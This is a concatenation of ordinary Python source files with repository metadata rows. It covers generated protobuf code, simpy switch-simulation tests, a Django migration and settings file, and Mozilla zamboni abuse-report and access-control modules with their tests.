message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='targets', full_name='easy_command.TaskSpec.targets', index=6,
number=7, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='appId', full_name='easy_command.TaskSpec.appId', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='clusterId', full_name='easy_command.TaskSpec.clusterId', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='easy_command.TaskSpec.packageId', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionId', full_name='easy_command.TaskSpec.versionId', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='needNotify', full_name='easy_command.TaskSpec.needNotify', index=11,
number=12, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callback', full_name='easy_command.TaskSpec.callback', index=12,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batchNum', full_name='easy_command.TaskSpec.batchNum', index=13,
number=14, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batchInterval', full_name='easy_command.TaskSpec.batchInterval', index=14,
number=15, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='failedStop', full_name='easy_command.TaskSpec.failedStop', index=15,
number=16, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=185,
serialized_end=552,
)
_TASKSPEC.fields_by_name['actions'].message_type = idcmanager__sdk_dot_model_dot_easy__command_dot_action__pb2._ACTION
_TASKSPEC.fields_by_name['targets'].message_type = idcmanager__sdk_dot_model_dot_easy__command_dot_target__pb2._TARGET
_TASKSPEC.fields_by_name['callback'].message_type = idcmanager__sdk_dot_model_dot_easy__command_dot_task__callback__pb2._TASKCALLBACK
DESCRIPTOR.message_types_by_name['TaskSpec'] = _TASKSPEC
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TaskSpec = _reflection.GeneratedProtocolMessageType('TaskSpec', (_message.Message,), {
'DESCRIPTOR' : _TASKSPEC,
'__module__' : 'task_spec_pb2'
# @@protoc_insertion_point(class_scope:easy_command.TaskSpec)
})
_sym_db.RegisterMessage(TaskSpec)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
2aeb0cb802cd448cc40eb31633927bc1dec209e9 | 6288f56016e0a1dc9e4a4eceb18425d4ae27f4a3 | /tests/test_shared_bandwidth_switch.py | a56dcf16eb26e6f748983a354187ef70850c7256 | [] | no_license | brettviren/ersatz | ec547fe347bfcc9ccafce7b159cc6378f3f4ab7d | 187df8096d5dadae2a115a7796cafd6d59c4f6af | refs/heads/master | 2021-01-17T22:14:06.475993 | 2018-01-21T18:31:31 | 2018-01-21T18:31:31 | 60,030,033 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,263 | py | #!/usr/bin/env python3
import simpy
from ersatz.switch import Switch, LinkedSwitch
from ersatz.datum import Datum
from ersatz.monitoring import trace
def test_balance():
    """Stage overlapping flows on a Switch and exercise bandwidth balancing.

    No asserts: prints the iteration count / max adjustment reported by
    balance() and dumps the staged-flow graph to test_balance.dot.
    """
    sw = Switch(None, 100)
    # Each input port ip feeds the nearby output ports [ip-2, ip+2).
    for ip in range(5):
        for op in range(max(0,ip-2),min(5,ip+2)):
            sw.stage(Datum(ip, op, 10, None))
    imb,count = sw.balance()
    print ('%d iters: max adj: %.1f' % (count, imb))
    sw.dump()
    # Emit the graph in Graphviz dot format for manual inspection.
    with open('test_balance.dot','w') as fp:
        fp.write(sw.dot())
def slurp(env, outbox):
    """SimPy process: drain *outbox* forever, printing each delivered datum."""
    while True:
        datum = yield outbox.get()
        print ('final: %s' % datum)
        print ('\tDONE: at %.1f, %s' % \
            (env.now, datum.payload))
        print('\t : %s -> %s' % (datum.txaddr, datum.rxaddr))
def add_stream(env, inbox, wait, txaddr, rxaddr, size, payload):
    """SimPy process: after *wait* time units, put one Datum into *inbox*."""
    print ('waiting %f to start stream of "%s"' % (wait, payload))
    yield env.timeout(wait)
    print ('starting stream with payload "%s"' % payload)
    yield inbox.put(Datum(txaddr, rxaddr, size, payload))
class FillData(object):
    """Trace hook that records every traced simulation event in order."""

    def __init__(self):
        # Recorded (time, priority, event id, event) tuples.
        self.data = []

    def __call__(self, t, prio, eid, event):
        self.data.append((t, prio, eid, event))
def test_switching():
    """Run three partially overlapping streams through one 10-unit Switch."""
    env = simpy.Environment()
    # Record every simulation event through the monitoring trace hook.
    monitor = FillData()
    trace(env, monitor)
    sw = Switch(env, 10)
    env.process(slurp(env, sw.outbox))
    env.process(add_stream(env, sw.inbox, 0, 'p1', 'p2', 50, "datum1"))
    env.process(add_stream(env, sw.inbox, 2, 'p1', 'p3', 50, "datum2"))
    env.process(add_stream(env, sw.inbox, 4, 'p2', 'p3', 50, "datum3"))
    env.run(until=200)
    # for item in monitor.data:
    #     print (str(item))
def test_linked():
    """Send one datum between two NICs attached to a LinkedSwitch."""
    env = simpy.Environment()
    # nic1 only transmits and nic2 only receives; the unused directions
    # are passed as None when linking below.
    nic1_addr = 'nic1'
    nic1_tx = simpy.Store(env)
    nic2_addr = 'nic2'
    nic2_rx = simpy.Store(env)
    env.process(add_stream(env, nic1_tx, 2, nic1_addr, nic2_addr, 50, "hello world"))
    env.process(slurp(env, nic2_rx))
    lsw = LinkedSwitch(env, 10)
    print ("Linking nic1")
    lsw.link_nic(nic1_addr, None, nic1_tx)
    print ("Linking nic2")
    lsw.link_nic(nic2_addr, nic2_rx, None)
    print ("running")
    env.run(until=200)
if '__main__' == __name__:
    # Allow running the suite directly, without pytest.
    test_balance()
    test_switching()
    test_linked()
| [
"[email protected]"
] | |
918a5618d56e51317a4a67dafb2975bf2f9b5e58 | 15531adf1e9b66db6259a52d16d0b0ddd672f4e9 | /backend-project/small_eod/institutions/migrations/0009_auto_20200618_2320.py | f79ca4d496e41841d8d2f2d73ddddb1de08763ad | [
"MIT"
] | permissive | watchdogpolska/small_eod | 2c81b0bb67113a4fd9f5c9c0f8b07daa2399e243 | 509f532e10c20e700cb9b37c73f4a695b53b42a8 | refs/heads/dev | 2023-09-01T01:30:44.681105 | 2022-03-31T19:36:39 | 2022-03-31T22:20:42 | 136,141,184 | 66 | 75 | MIT | 2023-09-04T14:33:37 | 2018-06-05T07:56:33 | Python | UTF-8 | Python | false | false | 739 | py | # Generated by Django 3.0.7 on 2020-06-18 23:20
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add free-text ``comment`` and many-to-many ``tags`` to Institution."""

    # Needs both the tags app (for the Tag model) and the previous
    # institutions migration.
    dependencies = [
        ('tags', '0005_merge_multiple_leaf_nodes'),
        ('institutions', '0008_auto_20200528_1330'),
    ]
    operations = [
        migrations.AddField(
            model_name='institution',
            name='comment',
            field=models.CharField(blank=True, help_text='Comment for this case.', max_length=256, verbose_name='Comment'),
        ),
        migrations.AddField(
            model_name='institution',
            name='tags',
            field=models.ManyToManyField(blank=True, help_text='Choose tags.', to='tags.Tag', verbose_name='Tags'),
        ),
    ]
| [
"[email protected]"
] | |
f761f157069a51fef2dade3ebdadd11611dbe111 | a18fba3eeb79b51faa55fcb1c45804ae57bb0aa4 | /wall_erd/Wall/settings.py | 7b1d1b9a14c56ad892d1bab1b6d1ec353c721c7b | [] | no_license | Catrinici/Python_Django | a850f732734f799c923035d4b28a9553e288194f | 9415b40a49fc9aa0a685937a62e259bd8103e208 | refs/heads/master | 2023-04-28T13:22:16.987969 | 2019-10-15T15:41:38 | 2019-10-15T15:41:38 | 206,885,302 | 1 | 0 | null | 2023-04-21T20:37:48 | 2019-09-06T22:52:27 | Python | UTF-8 | Python | false | false | 3,111 | py | """
Django settings for Wall project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment before deploying anywhere public.
SECRET_KEY = 'gi=3du&z-q8>8tc%z$x7qj#%zl=cm8xaya0mty3fxav3w#m2'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition

INSTALLED_APPS = [
    'apps.wall_app',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'Wall.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'Wall.wsgi.application'

# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases

DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/

STATIC_URL = '/static/'
| [
"[email protected]"
] | |
1582894d4bea212dea2a8089c8abb504a9236e37 | 9b9a02657812ea0cb47db0ae411196f0e81c5152 | /repoData/mozilla-zamboni/allPythonContent.py | a29dff3dd225280fe065aaccbef6790300d3de5c | [] | no_license | aCoffeeYin/pyreco | cb42db94a3a5fc134356c9a2a738a063d0898572 | 0ac6653219c2701c13c508c5c4fc9bc3437eea06 | refs/heads/master | 2020-12-14T14:10:05.763693 | 2016-06-27T05:15:15 | 2016-06-27T05:15:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,045,082 | py | __FILENAME__ = models
import logging
from django.conf import settings
from django.db import models
from django.utils.translation import gettext
import amo.models
import amo.utils
from addons.models import Addon
from users.models import UserProfile
log = logging.getLogger('z.abuse')
class AbuseReport(amo.models.ModelBase):
    """An abuse report filed against either an add-on or a user."""

    # NULL if the reporter is anonymous.
    reporter = models.ForeignKey(UserProfile, null=True,
                                 blank=True, related_name='abuse_reported')
    ip_address = models.CharField(max_length=255, default='0.0.0.0')
    # An abuse report can be for an addon or a user. Only one of these should
    # be null.
    addon = models.ForeignKey(Addon, null=True, related_name='abuse_reports')
    user = models.ForeignKey(UserProfile, null=True,
                             related_name='abuse_reports')
    message = models.TextField()

    class Meta:
        db_table = 'abuse_reports'

    def send(self):
        """Email this report to settings.ABUSE_EMAIL."""
        obj = self.addon or self.user
        if self.reporter:
            user_name = '%s (%s)' % (self.reporter.name, self.reporter.email)
        else:
            user_name = 'An anonymous coward'

        # Build the type label in the default locale so triage emails are
        # not localized per reporter.
        with amo.utils.no_translation():
            type_ = (gettext(amo.ADDON_TYPE[self.addon.type])
                     if self.addon else 'User')

        subject = u'[%s] Abuse Report for %s' % (type_, obj.name)
        msg = u'%s reported abuse for %s (%s%s).\n\n%s' % (
            user_name, obj.name, settings.SITE_URL, obj.get_url_path(),
            self.message)
        amo.utils.send_mail(subject, msg,
                            recipient_list=(settings.ABUSE_EMAIL,))

    @classmethod
    def recent_high_abuse_reports(cls, threshold, period, addon_id=None,
                                  addon_type=None):
        """
        Returns AbuseReport objects for the given threshold over the given time
        period (in days). Filters by addon_id or addon_type if provided.

        E.g. Greater than 5 abuse reports for all webapps in the past 7 days.
        """
        # Raw SQL because the per-addon HAVING aggregation is awkward to
        # express with the ORM; parameters are passed separately (no string
        # interpolation into the SQL itself).
        abuse_sql = ['''
            SELECT `abuse_reports`.*,
                COUNT(`abuse_reports`.`addon_id`) AS `num_reports`
            FROM `abuse_reports`
            INNER JOIN `addons` ON (`abuse_reports`.`addon_id` = `addons`.`id`)
            WHERE `abuse_reports`.`created` >= %s ''']
        params = [period]
        if addon_id:
            abuse_sql.append('AND `addons`.`id` = %s ')
            params.append(addon_id)
        elif addon_type and addon_type in amo.ADDON_TYPES:
            abuse_sql.append('AND `addons`.`addontype_id` = %s ')
            params.append(addon_type)
        abuse_sql.append('GROUP BY addon_id HAVING num_reports > %s')
        params.append(threshold)
        return list(cls.objects.raw(''.join(abuse_sql), params))
def send_abuse_report(request, obj, message):
    """Create, persist and email an AbuseReport about *obj*.

    *obj* may be an Addon or a UserProfile.  The report records the
    requester's IP address and, when authenticated, the reporting user.
    For add-ons, a background task is queued to detect abuse escalation.
    """
    is_addon = isinstance(obj, Addon)
    report = AbuseReport(ip_address=request.META.get('REMOTE_ADDR'),
                         message=message)
    if request.user.is_authenticated():
        report.reporter = request.amo_user
    if is_addon:
        report.addon = obj
    elif isinstance(obj, UserProfile):
        report.user = obj
    report.save()
    report.send()

    # Trigger addon high abuse report detection task.
    if is_addon:
        from amo.tasks import find_abuse_escalations
        find_abuse_escalations.delay(obj.id)
########NEW FILE########
__FILENAME__ = test_models
from django.conf import settings
from django.core import mail
from nose.tools import eq_
import amo.tests
from abuse.models import AbuseReport
class TestAbuse(amo.tests.TestCase):
    """Smoke tests for AbuseReport.send() email subjects and recipients."""

    fixtures = ['base/addon_3615', 'base/user_999']

    def test_user(self):
        AbuseReport(user_id=999).send()
        assert mail.outbox[0].subject.startswith('[User]')
        eq_(mail.outbox[0].to, [settings.ABUSE_EMAIL])

    def test_addon(self):
        AbuseReport(addon_id=3615).send()
        assert mail.outbox[0].subject.startswith('[Extension]')

    def test_addon_fr(self):
        # The subject must stay in the default locale even when the active
        # request locale is French.
        with self.activate(locale='fr'):
            AbuseReport(addon_id=3615).send()
        assert mail.outbox[0].subject.startswith('[Extension]')
########NEW FILE########
__FILENAME__ = acl
import amo
def match_rules(rules, app, action):
    """Return True if any rule in *rules* grants *action* on *app*.

    *rules* is the comma-separated list of ``app:action`` pairs stored on
    Group.rules.  ``*`` is a wildcard on either side of the colon, and an
    *action* of ``'%'`` matches any rule whose app part matches.
    """
    for chunk in rules.split(','):
        rule_app, rule_action = chunk.split(':')
        app_ok = rule_app in ('*', app)
        action_ok = rule_action in ('*', action) or action == '%'
        if app_ok and action_ok:
            return True
    return False
def action_allowed(request, app, action):
    """Return True if the request's user may perform *action* on *app*.

    'Admin:%' is true if the user has any of:
    ('Admin:*', 'Admin:%s'%whatever, '*:*',) as rules.

    Anonymous requests have no ``groups`` attribute and are never allowed.
    """
    for group in getattr(request, 'groups', ()):
        if match_rules(group.rules, app, action):
            return True
    return False
def action_allowed_user(user, app, action):
    """Like action_allowed(), but checks a user's groups directly."""
    return any(match_rules(g.rules, app, action) for g in user.groups.all())
def check_ownership(request, obj, require_owner=False, require_author=False,
                    ignore_disabled=False, admin=True):
    """Delegate an ownership/permission check to *obj*.

    Objects that know how to authorize access expose a
    ``check_ownership(request, ...)`` method; anything else is never
    considered owned by the requester.
    """
    checker = getattr(obj, 'check_ownership', None)
    if checker is None:
        return False
    return checker(request, require_owner=require_owner,
                   require_author=require_author,
                   ignore_disabled=ignore_disabled, admin=admin)
def check_addon_ownership(request, addon, viewer=False, dev=False,
                          support=False, admin=True, ignore_disabled=False):
    """
    Check request.amo_user's permissions for the addon.

    If user is an admin they can do anything.
    If the add-on is disabled only admins have permission.
    If they're an add-on owner they can do anything.
    dev=True checks that the user has an owner or developer role.
    viewer=True checks that the user has an owner, developer, or viewer role.
    support=True checks that the user has a support role.
    """
    if not request.user.is_authenticated():
        return False
    # Deleted addons can't be edited at all.
    if addon.is_deleted:
        return False
    # Users with 'Addons:Edit' can do anything.
    if admin and action_allowed(request, 'Addons', 'Edit'):
        return True
    # Only admins can edit admin-disabled addons.
    if addon.status == amo.STATUS_DISABLED and not ignore_disabled:
        return False
    # Addon owners can do everything else.  The role tuple is widened
    # according to which capability (dev/viewer/support) was requested;
    # the order of these elif branches is significant.
    roles = (amo.AUTHOR_ROLE_OWNER,)
    if dev:
        roles += (amo.AUTHOR_ROLE_DEV,)
    # Viewer privs are implied for devs.
    elif viewer:
        roles += (amo.AUTHOR_ROLE_DEV, amo.AUTHOR_ROLE_VIEWER,
                  amo.AUTHOR_ROLE_SUPPORT)
    # Support can do support.
    elif support:
        roles += (amo.AUTHOR_ROLE_SUPPORT,)
    return addon.authors.filter(pk=request.amo_user.pk,
                                addonuser__role__in=roles).exists()
def check_reviewer(request, only=None, region=None):
    """Return True if the request's user may review add-ons and/or apps.

    *only* restricts the check to 'addon' or 'app'.  *region* (apps only)
    checks for a region-specific review permission instead.
    """
    if only == 'app' and region is not None:
        # This is for reviewers in special regions (e.g., China).
        from mkt.regions.utils import parse_region
        region_slug = parse_region(region).slug.upper()
        return action_allowed(request, 'Apps', 'ReviewRegion%s' % region_slug)
    addon = action_allowed(request, 'Addons', 'Review')
    app = action_allowed(request, 'Apps', 'Review')
    if only == 'addon':
        return addon
    elif only == 'app':
        return app
    return addon or app
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from .models import Group, GroupUser
class GroupUserInline(admin.TabularInline):
    """Inline editor for group memberships on the Group change page."""
    model = GroupUser
    raw_id_fields = ('user',)


class GroupAdmin(admin.ModelAdmin):
    """Admin for ACL groups; memberships are edited inline."""
    raw_id_fields = ('users',)
    ordering = ('name',)
    list_display = ('name', 'rules', 'notes')
    inlines = (GroupUserInline,)


admin.site.register(Group, GroupAdmin)
########NEW FILE########
__FILENAME__ = helpers
import jinja2
from jingo import register
import acl
@register.function
@jinja2.contextfunction
def check_ownership(context, object, require_owner=False,
                    require_author=False, ignore_disabled=True):
    """Template helper: defer to acl.check_ownership for the current request."""
    return acl.check_ownership(context['request'], object,
                               require_owner=require_owner,
                               require_author=require_author,
                               ignore_disabled=ignore_disabled)
@register.function
@jinja2.contextfunction
def action_allowed(context, app, action):
    """Template helper: defer to acl.action_allowed for the current request."""
    return acl.action_allowed(context['request'], app, action)
########NEW FILE########
__FILENAME__ = middleware
"""
This middleware will handle marking users into certain groups and loading
their ACLs into the request.
"""
from functools import partial
import commonware.log
import amo
from access import acl
log = commonware.log.getLogger('z.access')
class ACLMiddleware(object):
    """Attach ACL helpers and the user's groups to every request."""

    def process_request(self, request):
        """Attach authentication/permission helpers to request."""
        request.check_ownership = partial(acl.check_ownership, request)

        # figure out our list of groups...
        if request.user.is_authenticated():
            amo.set_user(request.user)
            request.groups = request.user.groups.all()
            request.amo_user = request.user
        else:
            request.amo_user = None

    def process_response(self, request, response):
        # Clear the thread-local user so it never leaks across requests.
        amo.set_user(None)
        return response

    def process_exception(self, request, exception):
        # Same cleanup on the error path.
        amo.set_user(None)
########NEW FILE########
__FILENAME__ = models
from django.db import models
from django import dispatch
from django.db.models import signals
import amo
import amo.models
import commonware.log
log = commonware.log.getLogger('z.users')
class Group(amo.models.ModelBase):
    """A named set of ACL rules granted to its member users."""

    name = models.CharField(max_length=255, default='')
    # Comma-separated 'app:action' pairs; see access.acl.match_rules.
    rules = models.TextField()
    users = models.ManyToManyField('users.UserProfile', through='GroupUser',
                                   related_name='groups')
    notes = models.TextField(blank=True)

    class Meta:
        db_table = 'groups'

    def __unicode__(self):
        return self.name
class GroupUser(models.Model):
    """Through table linking users to ACL groups."""

    group = models.ForeignKey(Group)
    user = models.ForeignKey('users.UserProfile')

    class Meta:
        db_table = u'groups_users'
@dispatch.receiver(signals.post_save, sender=GroupUser,
                   dispatch_uid='groupuser.post_save')
def groupuser_post_save(sender, instance, **kw):
    """Audit-log group membership additions (skipped during fixture loads)."""
    if kw.get('raw'):
        return

    amo.log(amo.LOG.GROUP_USER_ADDED, instance.group, instance.user)
    log.info('Added %s to %s' % (instance.user, instance.group))
@dispatch.receiver(signals.post_delete, sender=GroupUser,
                   dispatch_uid='groupuser.post_delete')
def groupuser_post_delete(sender, instance, **kw):
    """Audit-log group membership removals (skipped during fixture loads)."""
    if kw.get('raw'):
        return

    amo.log(amo.LOG.GROUP_USER_REMOVED, instance.group, instance.user)
    log.info('Removed %s from %s' % (instance.user, instance.group))
########NEW FILE########
__FILENAME__ = tests
from django.http import HttpRequest
import mock
from nose.tools import assert_false
import amo
from amo.tests import TestCase, req_factory_factory
from amo.urlresolvers import reverse
from addons.models import Addon, AddonUser
from users.models import UserProfile
from .acl import (action_allowed, check_addon_ownership, check_ownership,
check_reviewer, match_rules)
def test_match_rules():
    """
    Unit tests for the match_rules method.
    """
    # Every rule set below should grant the 'Admin:%' wildcard action.
    rules = (
        '*:*',
        'Editors:*,Admin:EditAnyAddon,Admin:flagged,Admin:addons,'
        'Tests:*,Admin:serverstatus,Admin:users',
        'Admin:EditAnyAddon,Admin:EditAnyLocale,Editors:*,'
        'Admin:lists,Admin:applications,Admin:addons,Localizers:*',
        'Admin:EditAnyAddon',
        'Admin:ViewAnyStats,',
        'Admin:ViewAnyStats',
        'Editors:*,Admin:features',
        'Admin:Statistics',
        'Admin:Features,Editors:*',
        'Admin:%',
        'Admin:*',
        'Admin:Foo',
        'Admin:Bar',
    )
    for rule in rules:
        assert match_rules(rule, 'Admin', '%'), "%s != Admin:%%" % rule

    # None of these rule sets mention the Admin app, so they must not match.
    rules = (
        'Doctors:*',
        'Stats:View',
        'Addons:Review',
        'Apps:Review',
        'Personas:Review',
        'Locales:Edit',
        'Locale.de:Edit',
        'Reviews:Edit',
        'None:None',
    )
    for rule in rules:
        assert not match_rules(rule, 'Admin', '%'), \
            "%s == Admin:%% and shouldn't" % rule
def test_anonymous_user():
    """action_allowed() must be False for a request without .groups."""
    # Fake request must not have .groups, just like an anonymous user.
    fake_request = HttpRequest()
    assert_false(action_allowed(fake_request, amo.FIREFOX, 'Admin:%'))
class ACLTestCase(TestCase):
    """Test some basic ACLs by going to various locked pages on AMO."""
    fixtures = ['access/login.json']

    def test_admin_login_anon(self):
        # Login form for anonymous user on the admin page.
        url = '/en-US/admin/models/'
        r = self.client.get(url)
        self.assertRedirects(r, '%s?to=%s' % (reverse('users.login'), url))
class TestHasPerm(TestCase):
    """Role-by-role coverage of check_addon_ownership()."""

    fixtures = ['base/apps', 'base/users', 'base/addon_3615']

    def setUp(self):
        assert self.client.login(username='[email protected]', password='password')
        self.user = UserProfile.objects.get(email='[email protected]')
        self.addon = Addon.objects.get(id=3615)
        self.au = AddonUser.objects.get(addon=self.addon, user=self.user)
        assert self.au.role == amo.AUTHOR_ROLE_OWNER
        # Minimal stand-in for a real request object.
        self.request = mock.Mock()
        self.request.groups = ()
        self.request.amo_user = self.user
        self.request.user.is_authenticated.return_value = True

    def login_admin(self):
        assert self.client.login(username='[email protected]',
                                 password='password')
        return UserProfile.objects.get(email='[email protected]')

    def test_anonymous(self):
        self.request.user.is_authenticated.return_value = False
        self.client.logout()
        assert not check_addon_ownership(self.request, self.addon)

    def test_admin(self):
        self.request.amo_user = self.login_admin()
        self.request.groups = self.request.amo_user.groups.all()
        assert check_addon_ownership(self.request, self.addon)
        assert check_addon_ownership(self.request, self.addon, admin=True)
        assert not check_addon_ownership(self.request, self.addon, admin=False)

    def test_require_author(self):
        assert check_ownership(self.request, self.addon, require_author=True)

    def test_require_author_when_admin(self):
        self.request.amo_user = self.login_admin()
        self.request.groups = self.request.amo_user.groups.all()
        assert check_ownership(self.request, self.addon, require_author=False)
        assert not check_ownership(self.request, self.addon,
                                   require_author=True)

    def test_disabled(self):
        self.addon.update(status=amo.STATUS_DISABLED)
        assert not check_addon_ownership(self.request, self.addon)
        self.test_admin()

    def test_deleted(self):
        # Deleted add-ons are off limits even for admins.
        self.addon.update(status=amo.STATUS_DELETED)
        assert not check_addon_ownership(self.request, self.addon)
        self.request.amo_user = self.login_admin()
        self.request.groups = self.request.amo_user.groups.all()
        assert not check_addon_ownership(self.request, self.addon)

    def test_ignore_disabled(self):
        self.addon.update(status=amo.STATUS_DISABLED)
        assert check_addon_ownership(self.request, self.addon,
                                     ignore_disabled=True)

    def test_owner(self):
        assert check_addon_ownership(self.request, self.addon)

        self.au.role = amo.AUTHOR_ROLE_DEV
        self.au.save()
        assert not check_addon_ownership(self.request, self.addon)

        self.au.role = amo.AUTHOR_ROLE_VIEWER
        self.au.save()
        assert not check_addon_ownership(self.request, self.addon)

        self.au.role = amo.AUTHOR_ROLE_SUPPORT
        self.au.save()
        assert not check_addon_ownership(self.request, self.addon)

    def test_dev(self):
        assert check_addon_ownership(self.request, self.addon, dev=True)

        self.au.role = amo.AUTHOR_ROLE_DEV
        self.au.save()
        assert check_addon_ownership(self.request, self.addon, dev=True)

        self.au.role = amo.AUTHOR_ROLE_VIEWER
        self.au.save()
        assert not check_addon_ownership(self.request, self.addon, dev=True)

        self.au.role = amo.AUTHOR_ROLE_SUPPORT
        self.au.save()
        assert not check_addon_ownership(self.request, self.addon, dev=True)

    def test_viewer(self):
        assert check_addon_ownership(self.request, self.addon, viewer=True)

        self.au.role = amo.AUTHOR_ROLE_DEV
        self.au.save()
        assert check_addon_ownership(self.request, self.addon, viewer=True)

        self.au.role = amo.AUTHOR_ROLE_VIEWER
        self.au.save()
        assert check_addon_ownership(self.request, self.addon, viewer=True)

        self.au.role = amo.AUTHOR_ROLE_SUPPORT
        self.au.save()
        assert check_addon_ownership(self.request, self.addon, viewer=True)

    def test_support(self):
        assert check_addon_ownership(self.request, self.addon, viewer=True)

        self.au.role = amo.AUTHOR_ROLE_DEV
        self.au.save()
        assert not check_addon_ownership(self.request, self.addon,
                                         support=True)

        self.au.role = amo.AUTHOR_ROLE_VIEWER
        self.au.save()
        assert not check_addon_ownership(self.request, self.addon,
                                         support=True)

        self.au.role = amo.AUTHOR_ROLE_SUPPORT
        self.au.save()
        assert check_addon_ownership(self.request, self.addon, support=True)
class TestCheckReviewer(TestCase):
    """Coverage for check_reviewer() with and without review permissions."""

    fixtures = ['base/user_2519']

    def setUp(self):
        self.user = UserProfile.objects.get()

    def test_no_perm(self):
        req = req_factory_factory('noop', user=self.user)
        assert not check_reviewer(req)
        assert not check_reviewer(req, only='app')
        assert not check_reviewer(req, only='addon')

    def test_perm_apps(self):
        self.grant_permission(self.user, 'Apps:Review')
        req = req_factory_factory('noop', user=self.user)
        assert check_reviewer(req)
        assert check_reviewer(req, only='app')
        assert not check_reviewer(req, only='addon')

    def test_perm_addons(self):
        self.grant_permission(self.user, 'Addons:Review')
        req = req_factory_factory('noop', user=self.user)
        assert check_reviewer(req)
        assert not check_reviewer(req, only='app')
        assert check_reviewer(req, only='addon')
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
import amo
from . import models
class AddonAdmin(admin.ModelAdmin):
    """Admin for add-ons; restricted to Marketplace types (see queryset)."""

    exclude = ('authors',)
    list_display = ('__unicode__', 'type', 'status', 'average_rating',
                    'premium_type', 'premium')
    list_filter = ('type', 'status')

    fieldsets = (
        (None, {
